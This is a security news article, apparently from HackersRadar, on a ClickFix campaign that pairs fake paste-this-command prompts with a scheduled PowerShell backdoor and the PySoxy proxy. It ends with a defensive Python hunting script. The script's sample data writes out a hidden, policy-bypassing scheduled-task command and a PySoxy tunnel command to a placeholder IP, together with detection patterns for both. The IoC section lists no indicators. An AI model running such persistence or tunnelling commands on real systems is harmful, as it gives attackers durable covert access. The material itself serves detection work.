ClickFix Evolves: Integrates Old Open-Source Python SOCKS5 Proxy
The cyberattack campaign known as “ClickFix,” which manipulates users into executing malicious commands on their own systems, has evolved with a dangerous new development. While ClickFix techniques have circulated for some time, a recent incident reveals attackers are now integrating them with a 10-year-old open-source Python SOCKS5 proxy tool. This pairing creates a significantly more resilient form
What was once treated as a simple user mistake is now evolving into a complex multi-layered intrusion that can survive even after security tools step in to block it.
The attack begins when a user visits a compromised website that presents a fake prompt, convincing the visitor to paste and run a PowerShell command on their own machine. This well-known social engineering trick has been used in many previous campaigns.
What makes this version different is what happens after that single command runs. Rather than stopping at one callback, the intrusion sets up automated access that continues long after the initial click.
Security researchers at ReliaQuest identified this updated campaign in April 2026, noting that it marked the first observed case where ClickFix execution was combined with PySoxy, a Python-based SOCKS5 proxy tool originally published roughly a decade ago.
The analysts described the result as a “durable access chain,” one that continued re-executing even after outbound connections were blocked by security controls. That detail alone signals a meaningful shift in how this threat behaves.
ClickFix Deploys PySoxy
The central lesson here is one that defenders often overlook: blocking an attacker’s connection does not mean the attack is over. In the incident studied, both of the attacker’s access channels were cut off by endpoint controls, yet a scheduled task already on the affected machine kept attempting to relaunch the malicious script for hours.
This persistence mechanism transformed a single user mistake into an ongoing compromise. Ransomware affiliates may eventually begin treating ClickFix as a primary entry point alongside other established access methods.
The operational similarities between this chain and SocGholish intrusions, which also rely on social engineering before moving into reconnaissance and proxy-based access, suggest ClickFix is maturing into a serious pre-ransomware delivery platform.
Once the initial PowerShell command ran, the attacker moved quickly to build a deeper foothold. A scheduled task was planted that relaunched a staged script from the C:\ProgramData folder roughly every 40 minutes. That script functioned as a lightweight remote access tool, polling the attacker’s server every three seconds, executing commands on the host, and sending back results.
After establishing this PowerShell-based access, the attacker moved into reconnaissance. Built-in Windows tools were used to enumerate group memberships, identify domain controllers, and map other machines on the network. Only after confirming that a staging server could be reached did the attacker introduce PySoxy, downloading compiled Python bytecode and running it with proxy arguments pointing to a separate external IP address.
PySoxy gave the attacker a second, independent route back into the host. This second channel used different infrastructure and a different traffic pattern than the first, meaning that a complete shutdown of the PowerShell C2 connection would still leave this second door open. The attacker had built two separate access paths into the same environment.
Why a Blocked Callback Is Not Enough
The most important takeaway from this campaign is that containment requires more than blocking a single connection. Analysts recommend fully isolating the affected host and reviewing all scheduled tasks, particularly those created shortly after suspicious PowerShell activity. Any tasks pointing to scripts in non-standard directories like ProgramData should be treated as high-priority findings.
Incident responders should look for Python execution tied to proxy-style command-line arguments, specifically flags like -ssl, -remote_ip, and -remote_port, as well as compiled .pyc files in unexpected locations. Removing staged scripts, Python runtimes, and bytecode files is just as critical as blocking the network connection, because any leftover component can restart the chain. Treating a ClickFix incident as a potential full compromise rather than an isolated user error is now the only appropriate response.
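A small hunting routine for the two footholds described above (the ProgramData scheduled task relaunching a PowerShell script, and python.exe started with PySoxy-style -ssl/-remote_ip/-remote_port arguments or a .pyc from a non-standard directory), added here as an example and not code from ReliaQuest or HackersRadar. The telemetry records, file paths, task names and IP addresses are constructed placeholders.

```python
import re

# Constructed sample telemetry: (image, command line) pairs as an EDR would log them.
SAMPLE_EVENTS = [
    ("C:\\Windows\\System32\\schtasks.exe",
     r'schtasks /Create /SC MINUTE /MO 40 /TN Updater /TR "powershell -ep bypass -w hidden -f C:\ProgramData\stage.ps1"'),
    ("C:\\Users\\alice\\AppData\\Local\\Programs\\Python\\python.exe",
     r'python.exe C:\ProgramData\pysoxy.pyc -ssl -remote_ip 203.0.113.10 -remote_port 443'),
    ("C:\\Windows\\System32\\schtasks.exe",
     r'schtasks /Create /SC DAILY /TN Backup /TR "C:\Program Files\Backup\backup.exe"'),
    ("C:\\Python311\\python.exe", r'python.exe C:\Users\alice\dev\app.py --port 8080'),
]

# PySoxy-style proxy arguments named in the article.
PROXY_FLAGS = {"-ssl", "-remote_ip", "-remote_port"}
# Non-standard drop directories; a script or .pyc here deserves a look.
STAGING_DIR = re.compile(r"(?i)\\(programdata|users\\public|windows\\temp|appdata\\local\\temp)\\")
# The /TR (task action) value of schtasks, quoted or bare.
TASK_ACTION = re.compile(r'(?i)/TR\s+(?:"([^"]+)"|(\S+))')

def check_scheduled_task(cmdline):
    """Flag schtasks /Create whose action runs a PowerShell script from a staging dir."""
    low = cmdline.lower()
    if "schtasks" not in low or "/create" not in low:
        return None
    m = TASK_ACTION.search(cmdline)
    action = (m.group(1) or m.group(2)) if m else ""
    if "powershell" in action.lower() and ".ps1" in action.lower() and STAGING_DIR.search(action):
        return f"scheduled task relaunches staged script: {action}"
    return None

def check_python_proxy(image, cmdline):
    """Flag python.exe launched with proxy flags or running bytecode from a staging dir."""
    if not image.lower().endswith("python.exe"):
        return None
    args = cmdline.split()
    hits = PROXY_FLAGS.intersection(a.lower() for a in args)
    pyc = [a for a in args if a.lower().endswith(".pyc") and STAGING_DIR.search(a)]
    if len(hits) >= 2:  # two or more proxy flags together is the PySoxy pattern
        return f"python with proxy args {sorted(hits)}"
    if pyc:
        return f"python running bytecode from staging dir: {pyc[0]}"
    return None

def hunt(events):
    """Run both checks over (image, cmdline) pairs; returns (image, reason) findings."""
    return [(img, r) for img, cmd in events
            for r in (check_scheduled_task(cmd), check_python_proxy(img, cmd)) if r]
```

Run over real process-creation telemetry, each finding should be paired with the host's scheduled-task list so the staged script and Python runtime are removed together, not just the outbound connection.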
Indicators of Compromise (IoCs):
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.